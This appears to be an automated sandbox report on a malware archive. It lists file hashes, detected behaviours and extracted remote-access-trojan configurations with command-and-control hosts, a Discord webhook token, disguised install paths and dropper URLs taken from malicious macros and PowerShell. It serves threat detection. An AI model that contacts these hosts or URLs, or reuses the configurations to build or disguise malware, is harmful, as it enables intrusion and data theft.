General

  • Target

    250602-saf2yahp31.bin

  • Size

    466.8MB

  • Sample

    250602-sf34nahp9w

  • MD5

    72364945b46c400678b30759b1cdda52

  • SHA1

    55c1e9725dab3925e63943c5aa4329d6fee0012d

  • SHA256

    bd5ee1f6ebe18c36a0168c43f459f54fd133d35244b269e4ecef5bd2a484c72b

  • SHA512

    13a9ef2c624bde874181a33f21cf62f4ffa52a8a7e958a729088b7fab1462f4d71775934b10b1b1ac678f6e18d9f2832c33440aec8dbfe815348345bf8bbc42b

  • SSDEEP

    12582912:V3JuitJi1QjcTh6WzDfCP/Hs+6IQ23CvC9n6Vy8QC+xk:V3IiC1Q6hbzWPvs+TQICoOy//a

Malware Config

Extracted

Family

orcus

C2

192.168.171.129:10134

pont9245.ddns.net:7777

147.185.221.16:18244

hostip00.duckdns.org:10134

91.218.65.24:10134

s7vety-27063.portmap.host:27063

kissmyasshole.myddns.me:1012

Mutex

186d21ec80e143edb3384fa80d4ee7f8

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\OrcusWatchdog.exe

Extracted

Family

orcus

Botnet

Roblox script injector

C2

youcantfindmelol.ddns.net:10134

Mutex

de0e17d469cc46849280a8cd4d643763

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    true

  • install_path

    %programfiles%\Java\Java.exe

  • reconnect_delay

    10000

  • registry_keyname

    Java

  • taskscheduler_taskname

    Java Updater

  • watchdog_path

    Temp\Java Updater.exe

Extracted

Family

orcus

Botnet

NEW

C2

122.186.23.243:10134

Mutex

c7798e5973374c92859ce651077d0576

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    true

  • install_path

    %windir%\Desktop Window Manager.exe

  • reconnect_delay

    10000

  • registry_keyname

    Program

  • taskscheduler_taskname

    Windows

  • watchdog_path

    AppData\OrcusWatchdog.exe

Extracted

Family

orcus

Botnet

EMVLATEST

C2

3.tcp.eu.ngrok.io:22028

Mutex

699ea505fbd445a7924b6888db7a5f2a

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    true

  • install_path

    %programfiles%\Windows Security\Microsoft Defender.exe

  • reconnect_delay

    10000

  • registry_keyname

    javaservice

  • taskscheduler_taskname

    win10service

  • watchdog_path

    AppData\javaforwin.exe

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

friendlyman69.ddns.net:55042

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    true

  • install_file

    lsass.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

darkcomet

Attributes
  • gencode

  • install

    false

  • offline_keylogger

    false

  • persistence

    false

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:5555

hostz.hopto.org:5555

172.65.175.19:443

127.0.0.1:7000

council-amp.gl.at.ply.gg:59436

28.ip.gl.ply.gg:65453

Mutex

Nyv6QFoXtqKjtLri

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    DMA Driver.exe

aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain

Extracted

Family

nanocore

Version

1.2.2.0

C2

90.120.50.244:2518

127.0.0.1:2518

Mutex

6baeca53-6eec-4a83-8679-c479f2f1a649

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    127.0.0.1

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2020-11-20T17:31:41.353489336Z

  • bypass_user_account_control

    false

  • bypass_user_account_control_data

    PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    2518

  • default_group

    Default

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    6baeca53-6eec-4a83-8679-c479f2f1a649

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    90.120.50.244

  • primary_dns_server

    8.8.8.8

  • request_elevation

    false

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    false

  • set_critical_process

    false

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

xworm

C2

studies-license.gl.at.ply.gg:48057

dpwekwpd-58261.portmap.io:58261

127.0.0.1:7000

127.0.0.1:2321

133.23.21.222:2321

28.ip.gl.ply.gg:65453

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    USB.exe

aes.plain

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1367163929452613703/0Ot4VsdGUKWdMg4T-pgsrzxgFAOyvGEFGDEYD7_CrEfiWkjJTQFitsIjIZavpL8rfypz

Extracted

Family

orcus

Botnet

NOOB NONAME

C2

26.223.23.213:25565

Mutex

378fcdd4ef824c7db5946dd1cf8ec64f

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    true

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    Temp\OrcusWatchdog.exe

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.toteteca.com/qzkiodlofm/5555555555.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://zenithcampus.com/l/yQ/

exe.dropper

http://hbprivileged.com/cgi-bin/kcggF/

exe.dropper

http://localaffordableroofer.com/ralphs-receipt-f2uhf/qTT5DC/

exe.dropper

https://johnhaydenwrites.com/track_url/P/

exe.dropper

https://nahlasolimandesigns.com/nahla3/d/

exe.dropper

https://football-eg.com/web_map/n/

exe.dropper

https://vietnhabienhoa.com/wordpress/QUTy/

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://zhongsijiacheng.com/wp-content/jn5/

exe.dropper

http://artistascitizen.com/wp-content/Bx3cr6/

exe.dropper

http://ombchardin.com/archive/V/

exe.dropper

https://apsolution.work/magneti-marelli-zkkmb/toq7Eiy/

exe.dropper

https://happycheftv.com/wp-admin/z6uGcbY/

exe.dropper

https://careercoachconnection.com/tenderometer/4K/

exe.dropper

https://tacademicos.com/content/JbF68i/

Targets

    • Target

      uploaded/057c3508b21674c3ab95c4c0f26a7195a6aba8d35464dfc97d96452479d430de.exe

    • Size

      2.7MB

    • MD5

      2648c64711a910797ec85e145d45fe3e

    • SHA1

      bca3cd7091f73be66213f7aac1bef1be1527bfb2

    • SHA256

      057c3508b21674c3ab95c4c0f26a7195a6aba8d35464dfc97d96452479d430de

    • SHA512

      129d8f7afbf4d05568df05319b2e684235e3392e3928252ad35c227abe22870114c6d343fded5ecbf98d105f16c7ddc0eb0487020f1b7efa785dcacd1c203e82

    • SSDEEP

      49152:ROnDZlOiVb/3pYBZpUh0QuM5enR/Iy1TqjUC6R5SAq6Iex20AB4T2zQbk3G4QZDv:ROzJVb/3QGgnR/Iy1TEUnbqiI0AB4XkC

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Target

      uploaded/0f0d2abea57c5403fb538eef2e42d5003.exe

    • Size

      409KB

    • MD5

      3d6531f8f4eb1b41f62e8a55f033735f

    • SHA1

      aa250187efbbb4254d14949d862b41c6125b452c

    • SHA256

      f7f8ca0ae4af42baa3586561ce73cea45445e439eec867091704a696de334e96

    • SHA512

      505bb32692f7e65106dc55eb8fdb9eb0b4b095d1fbc6b3c33d496fbd9f540e7c05c0f42df3401c7d1933f0f48fb51844e61c5b6bdbf29a2d2ff273366076a121

    • SSDEEP

      12288:P//ZbUXN0kCD9pZ4QQxCQDrX2t9xqkHE7J:P3Zbm0BZvQxCgrXS9f6

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/0fec46875e62cf4c572c4cc4cc7e84374.exe

    • Size

      73KB

    • MD5

      c0bae473a586ca639fd3f0e2113ae32c

    • SHA1

      562c4595d866f71de81d72f2a1356dd0b266aa2f

    • SHA256

      d423b582ccf801825bf5a60d1c0a0ffdf5b06704507f327873d4790029753ffe

    • SHA512

      947863e46bb0a1275343a7383d6708dcacc1e53e9e6ff6c1006f527d838f7836670af9a446a01c11c01b292e8096ce8f3b51de7d8d142a17c691342ba00d3309

    • SSDEEP

      1536:Hj0eb32T01PQb3zTjbM6ptmJTYHjR9Ob4UGpGtP43KBp:3bFMzTFq+N48UxpP

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/1.exe

    • Size

      913KB

    • MD5

      c02308ef085b976898fa42b065254aa2

    • SHA1

      95e03e7644a56af5fefc12c32b2c86b2c20fe5af

    • SHA256

      6b4adc3f05b6f7968d826b26b6a472ad3906a5b659eae167bd3a922415c6133d

    • SHA512

      e64ee710eb5fedb7d7220a8876b64945a76f70e2880100b30d340e346d0880a98085c8c183f2796f6c706347de030124daeb5a8fcda7aff578bf1cb88ee484e5

    • SSDEEP

      24576:X+5T4MROxnFm5bHKTlQZrZlI0AilFEvxHizS9:u50MiAZrZlI0AilFEvxHi

    Score
    6/10
    • Drops desktop.ini file(s)

    • Target

      uploaded/123.exe

    • Size

      903KB

    • MD5

      264e7741729c68da987f40f4cd19a36f

    • SHA1

      16dc103026652605229355ced92127fd1c85bbc2

    • SHA256

      94ad5e95fc0167221e93b241d4890649158fb8a59272d9e96ad741d3b7e51fff

    • SHA512

      e2d5bd4fd3e08f69cb225e5c72d2a515770292df59c14c6f20c45cc1736145dc148ab2a05ff78ab560a84ca696fb7937a9a8d193696a2b8337eabc5f07ed9168

    • SSDEEP

      12288:00XCGPSX0zbyD+ndg+QCImGYUl9qyzlkE2kUNCVyrO12nIMmJPepjikbQ7dG1lF/:qPF4MROxnFNHrrcI0AilFEvxHPmooo

    • Orcus

      Orcus is a Remote Access Trojan that is being sold on underground forums.

    • Orcus family

    • Orcurs Rat Executable

    • Target

      uploaded/1546d38e814b5348b877ade61fa7cc0f7.exe

    • Size

      73KB

    • MD5

      2bbc55048c13c64ff4f381d02fd2e37d

    • SHA1

      c0de7b7c3bc33898db1134126bad349abc6eec6e

    • SHA256

      ba06a9df44bb8d2439f9ec8ef3cf7ab8349abdc9dc60593f5718785ceb4e7e76

    • SHA512

      3b9a62cb11ad5c5abc3466d4e2208242c421d801bbae4151fc36754d7c579cabe661a06ffa7bf30ad6257fa80f343ab295836281711396abffd0bdfe5dff6548

    • SSDEEP

      1536:zj0eb32T01PQb3zTjbM6ptmJTYHjR9Ob4UGpGtDl3K7:LbFMzTFq+N48U1E7

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/1812b1b80810a47d68157ec25c3a44e7b.exe

    • Size

      124KB

    • MD5

      1b83cb61b35c039591f2ff3380e04d81

    • SHA1

      f70328bdcddd8b70c847db5eba6f8fe777f99397

    • SHA256

      790353165b689048a77a6aa76010b561db500d85e3d3509b1ce869204129de49

    • SHA512

      3f43b80d07db00cb204890c9b62fe0563d456d6621a2bfacdbf9568b1e03562197fec849896c804b8c2fdc2f686fa2a244ad69261d2919b74857b973fe02e733

    • SSDEEP

      3072:5hjQjOmwnvFHygjCLf85f5EuO2qixYDZFeEI7:5hjVvFSgjCLf85f5h4ixYDZFm7

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/19a972ce0137c326e9a800096bc442276468096ad02c6dec2aba37564d0e441e.exe

    • Size

      1.9MB

    • MD5

      7c282de58057bcbd9fd001d5bd5c9728

    • SHA1

      13080576fcdd77d6219c948f33e242a1a3f19efb

    • SHA256

      19a972ce0137c326e9a800096bc442276468096ad02c6dec2aba37564d0e441e

    • SHA512

      15221e1da59d05d011809d95b3c235356cebc341ba04190edee4e1143bf3a5c415809a427419cf08f8a10c0c7772bc1427412199fbd588e6adfbca285e2d9eb4

    • SSDEEP

      49152:1fDODfDFnzD1Us+kMg7ZFZrr89UfT3MF:Cr8AMF

    Score
    1/10
    • Target

      Archivo_2001_2021_49-381887.doc

    • Size

      158KB

    • MD5

      74ab40efc21fceb14a432f7c4d000b67

    • SHA1

      5fb79750ab4f78e18c3d1800be5b2e9ac0959db3

    • SHA256

      89680559595f62f12bfdd9338c525133244ea6b7f23bb9b5b798ce04232817f0

    • SHA512

      d2abd2bebf5485aeaa570b4d019c426afaa1173f4f428eafecc617072c7f86242db306098ec3081135e71c69ae18b0f28504313f5f0cdd70f8634c3d1ed8a70d

    • SSDEEP

      3072:OL1QUTdcrrXyQBsc0vWJVi4IrwVdmZVT2Vq:OLC9PII4R2V

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Target

      Refusal-217432546-01212021.xlsm

    • Size

      25KB

    • MD5

      7a0ca2f162b86659f47411d39f8be75e

    • SHA1

      8ee78da95af22a1d01d3ec035eaccdeb5be44276

    • SHA256

      70a5d9ef163f6e6c7e32c366363d7d4e9a6cbb06df84802edd177acb907fe092

    • SHA512

      c22ffe07d03a3d605e77da77d4a8f5425bc32ae7da5bf1abe558b265f8cd396d83f4f438b620611f65b6d0383e75cf197d75807036f733123cc820f5ee471a95

    • SSDEEP

      384:4Mfowh92aGcoKKRR6xt7k5SV8m2ylTQ8aoVT0QNuzWKP8WZoms:4MflhQaGc7SsFk5S6f6TfW+u7DZRs

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Target

      uploaded/222.exe

    • Size

      907KB

    • MD5

      9474c8c2696babee986e8ae1bc46bd78

    • SHA1

      1bcbfc24030a8e09c15055ad90685cac7af24cb1

    • SHA256

      b2f324d6ae851aa65773d233201d58ac5230d525281afd1775e0b82514ac9645

    • SHA512

      bf03529601fb0a935188c6efd72e5d752aed5c23085ade870a385c47b746b8ce9927527c78ab61c28a4d4b8cf23217b1e74e76ee6e1644d85439646a216f5153

    • SSDEEP

      24576:ocI4MROxnFj3qxXFHXRrZlI0AilFEvxHiW8F:ocrMi1mRhrZlI0AilFEvxHiW

    • Orcus

      Orcus is a Remote Access Trojan that is being sold on underground forums.

    • Orcus family

    • Orcus main payload

    • Orcurs Rat Executable

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Drops desktop.ini file(s)

    • Target

      uploaded/2531 2212 2020 QG-826729.doc

    • Size

      213KB

    • MD5

      cf288a156f60cf132cf14c617b41a154

    • SHA1

      b4dbb03f48b651d2a81849a12049a9ac9f5295a2

    • SHA256

      3a15b42c4692483aedb912298719b52e5513cf3d2a58ffca07c78fa8c48b536c

    • SHA512

      f694cfad3e816fc7af937a6eca905ae4c1fa71fc1be1a2c4f56b9060bdfc2eb0fee520698b80bb92bdbfffedd13c50946a5e08f1f8e863a259629e9e419b754c

    • SSDEEP

      3072:O9ufstRUUKSns8T00JSHUgteMJ8qMD7gRyHYbwRe/dNx0tcn15rJDMsIxS:O9ufsfgIf0pLxbwQlNx0tw15rJDMsIxS

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Target

      uploaded/25f2c4054d0680fd51f2cf860055f2234.exe

    • Size

      162KB

    • MD5

      91106264680a5cc064c550a62c8650c7

    • SHA1

      67758edc66f1160728b82ab7608bb0cf1ad7fc5a

    • SHA256

      b3fb1ae7923313ad51ec2101c28fd1f1417cc987f33272227fdc1745c5e5261b

    • SHA512

      4a5dc892381f09c7628f71c386756026ca432e4614e26a46309fdd9d2453c76643f58ebe8e61cc0d567cb563a0ab484f18b85c90afa9b65aef14863fc166dbf3

    • SSDEEP

      3072:0LzOI+8oz3Y+u1gb2KoTJBJsHZ4AYsRmwRCRJJI3itUWJNem6q:0H2zTu1gbAvMZ4A9RPLpy

    Score
    3/10
    • Target

      uploaded/2bb792ea1927ddd3a5a245eaf96c06ca2598191f670750c24d5b9ed47f20e147.exe

    • Size

      9.8MB

    • MD5

      23e735b01c2f68b79d9e6cd8ac8e42f4

    • SHA1

      b3edba909b2fbdd8d0217bb956f3ee500f9ab137

    • SHA256

      2bb792ea1927ddd3a5a245eaf96c06ca2598191f670750c24d5b9ed47f20e147

    • SHA512

      44a0a253919ef8a956799bfd3fcd4e40dcbe21ef493a98597d798ed8c53f7d4e801b7f43c182d3df970f185696d46dcc05bb1f94895a863875da94ce282837ff

    • SSDEEP

      196608:JGtFyDDwRv5DFUhA7yUjCaoQLXtN9rEs2oLkdDPbrTOjJ/XY2a8nH36CJ5:otFyDDwRvl6hTjaoALAoL6DzrTYvvaK5

    Score
    7/10
    • Loads dropped DLL

    • Target

      uploaded/2e5473aa5ebf01ac5ce00c7ad537ddcb2.exe

    • Size

      73KB

    • MD5

      e1a1a8ec650e500872946774b1b9c30e

    • SHA1

      0622e0ab98bcd1a289732e4cad457e1474d84b4a

    • SHA256

      43e54d4e4f485f789739694024b6136f5e5215172555a846608abc8f5386c19a

    • SHA512

      fe659312fcb4ce55ece76bafbd61ffce5774fa51223b215276d4e1eac4176f0a717749ddc4af97d2bf7a81242d1ae5b25ae08329b245ab6a64e11fd2ccb0fa9a

    • SSDEEP

      1536:sj0eb32T01PQb3zTjbM6ptmJTYHjR9Ob4UGpGtfW3Kn8:KbFMzTFq+N48UVj8

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/387812ee2820cbf49812b1b229b7d8721ee37296f7b6018332a56e30a99e1092.exe

    • Size

      144KB

    • MD5

      c2a760c6461449ac1d5a5538242bed11

    • SHA1

      59684c6261afc698c0f6a46658986f0268f4c5a0

    • SHA256

      387812ee2820cbf49812b1b229b7d8721ee37296f7b6018332a56e30a99e1092

    • SHA512

      b00734a77c70f18ed10049c67823316498208b32e9f662f9fa56074b862bd8606826947f8cb394ed48d0d9b88f47e7fa214153e53fbc83c60bb7075d57375dd8

    • SSDEEP

      3072:/29rIyJvv9Gq9q/uNKFO+oFGqN/xJCpgDjXYQWNoF97PYJ:e98S9Gq9WM5Z2mbYQWNslY

    Score
    3/10
    • Target

      uploaded/3c8ec4a8a8c3b1fbabc577576da5b70f5ddf3460b68775f3fbfa4fc07b6a7fa4.exe

    • Size

      11.8MB

    • MD5

      b777cfa3f6c7d8ad118caf620908a60d

    • SHA1

      46a0af09d1901ceaca3ccde27499ee1b91cdf0e1

    • SHA256

      3c8ec4a8a8c3b1fbabc577576da5b70f5ddf3460b68775f3fbfa4fc07b6a7fa4

    • SHA512

      f41be2c1673f8fe1f884b36a74b0e2e906702432375aab0934e7afaf329a576943a077a7369adf134136be26b823a699c025d3e5c0a7e54bf1d939a25ddf8745

    • SSDEEP

      196608:54F1KIlUrJyTOZzEwLVa1XwETq4FHsm1hmKXdFL5d3IH:yF4LyTOZ3LVgXwCDFHsm1hm8dJI

    Score
    8/10
    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Drops startup file

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Target

      uploaded/3ca0877ae8c3c628acfe78c6847f770fe20f02790f69749216cc703ab0618002.exe

    • Size

      1.4MB

    • MD5

      ac28e024b3b8e7a054dfaa2883a5590b

    • SHA1

      2ad3d0cb84a244acff393912c4b54c716d99c94c

    • SHA256

      3ca0877ae8c3c628acfe78c6847f770fe20f02790f69749216cc703ab0618002

    • SHA512

      b1c06d213b7f3753277516042f989c7ee62bd12c77736905f839531bcbd946db1010c2f96862da8362c5f7d639255e433e1220b256bd83690a265860f76e2465

    • SSDEEP

      24576:2h+EpSgP3ZEgRhuRKOODzjJBwjOGfcCUWgEf0ZsMCmGJHxyAXml2SAaj:qa+PjJaEWZAsTv2AE

    Score
    5/10
    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Target

      uploaded/4c6265723661653d2fdab12a0d5d7e841.exe

    • Size

      409KB

    • MD5

      916707fcffcec2b8ae25dd706486f469

    • SHA1

      6905656c07c1185b943520ea07980f422096f0a2

    • SHA256

      8e0bf3262f19da58a5e045c85d918e4a35b873dc1ac3a8c26dc7aa2fa07b59de

    • SHA512

      5c8e1fe8b4b2d8a3b75e0b5bc462a2c55ab9fad090b40dbf227195be0d1de7d025a4dac3bcffe611e076a96d905ad2c02e06b64218dc906cf2684332ea7cdab6

    • SSDEEP

      12288:V//ZbUXN0kCD9pZ4QQxCQDrX2t9xqkHE7o:V3Zbm0BZvQxCgrXS9fb

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/5b518173a571366bfdce5cdd282738a38.exe

    • Size

      124KB

    • MD5

      d2c28ef77a6a7ef28b84df3464343350

    • SHA1

      5b2d21c3a4ea1eb3f87da7a78a6fad36f47f87f8

    • SHA256

      fa2e2163cadd8dfefa97026e2f8c53540c436f05c7a0c60d25fec0025d39bf65

    • SHA512

      d6602c496c872f051641aee3888923302c1cc9c21c104c17ef4ca623e49ca75212ae9a2bb92adfb25c7c56439381e1310c1cdb764c0a89ef741eb23c4794dbf4

    • SSDEEP

      3072:AhjQjOmwnvFHygjCLf85f5EuO2qixYDZFeEQH:AhjVvFSgjCLf85f5h4ixYDZFmH

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/6a4af3ace8066e79a1020e27b2c1cc3f81d6cd8d68d1329e67b93e44b9d3d008.xls

    • Size

      173KB

    • MD5

      6917d9ca4f9604ee09d08d5c33e93955

    • SHA1

      dcdde605528c7678d80472df024b0b0a9846c2d6

    • SHA256

      6a4af3ace8066e79a1020e27b2c1cc3f81d6cd8d68d1329e67b93e44b9d3d008

    • SHA512

      c752681f5cf715ffb8b99ce1cb2c9c860dea19c428fe16d8cd3a7779f1fb40ec4dd9c3f642df226a54e5072946574e38881db615d0819d26faf4bda1bfb34b88

    • SSDEEP

      3072:8Gk3hbdlylKsgqopeJBWhZFGkE+cL2NdAs7tT3O8g+nstPBXn3d1p60COnKmR4nq:xk3hbdlylKsgqopeJBWhZFVE+W2NdAs6

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Target

      uploaded/6fecc453c515bb03d82132650d3d4c6bb.exe

    • Size

      73KB

    • MD5

      75eefc3917333126cb56caf4500cb90b

    • SHA1

      bc8540268e083379ac6d1f831dbbe4c58a4bd878

    • SHA256

      89a22cb4f3cd4a8d122bf5198642cd5ddfc8fcab309e6b0ee284a8d679da6aaa

    • SHA512

      ec002df43e15c841b83de648cf0195b7e8f1e9165dfc83b5fa08b2f13f9c1bc9fb97f1a90eb1792977ff3929f0200aa0d98fe5db1182b80757cf22d52d864b21

    • SSDEEP

      1536:Ij0eb32T01PQb3zTjbM6ptmJTYHjR9Ob4UGpGt7d3K3s:ebFMzTFq+N48Uhc8

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/70730f33f4db9f15399c6e4a510a5c4eec3bf100206535155001a2b3adbb3077.exe

    • Size

      9.1MB

    • MD5

      e31052a27988895bf8ebdc1edeb3260a

    • SHA1

      f81548c4719fb228e38eb3b4e5f245ff48eaf817

    • SHA256

      70730f33f4db9f15399c6e4a510a5c4eec3bf100206535155001a2b3adbb3077

    • SHA512

      b2260c20369c86d844c66dacc4bfb94e4249968a753e3eaa3f46ce1548b50db434f55bd71c4cc6407d08943e707bdbd3d9e208da00edd72e2bc5fccd25ca2571

    • SSDEEP

      196608:JGgFyDDwRv5DFUhA7ClLskLUJge/2bJh0N4JLmILxgnnANnJzQcaT6ixhts:ogFyDDwRvl6hRLfUJg5leN4FvLxgniJh

    Score
    7/10
    • Loads dropped DLL

    • Target

      uploaded/70e835f3140dc2fbc211273727a8a8b4d.exe

    • Size

      489KB

    • MD5

      68975d70f5c844bc1fd923813d42b31b

    • SHA1

      3d07569e46b8e026b608fa5c5e4186abf58bf02e

    • SHA256

      aae4696fa35c74a7aa3e9b75ae37d4ffa9a81f64bf647c801252f3abb29c21d8

    • SHA512

      4d475614543df97037f327a3ca5faa10396eff193729ecd1da87dc66f0d2386e720d55095c9df92116d9206832db424680e95d9fad02bcdca0cd31aa91ea422c

    • SSDEEP

      12288:wrxZ//3SfgfZCgOAZw+i+vwnPWybFxJ8fk0:wtZ/VCgOAnAb+F

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/83682a6a473ca2135d14cbc52c584fb46.exe

    • Size

      73KB

    • MD5

      58055f9b4e9693cc527a5704822bb0b1

    • SHA1

      2997d16203f1bf4d512b1a4dfd41eb8965759456

    • SHA256

      6d37a9d452090fd4ff8fccff8242473ffc4c7a90946faab6f31e06c5d725f5e5

    • SHA512

      6e7af8314c122a9d3a51f85fc420f6429916b1202034ae873d81d13a17f74b6c2163548733b87f4529984bed374b1d4e30223b6d92c2a1218292b33f66989347

    • SSDEEP

      1536:Vj0eb32T01PQb3zTjbM6ptmJTYHjR9Ob4UGpGNx3KfO:hbFMzTFq+N48URAm

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/882f4c1313d37351d72004caa3ef1aee0.exe

    • Size

      409KB

    • MD5
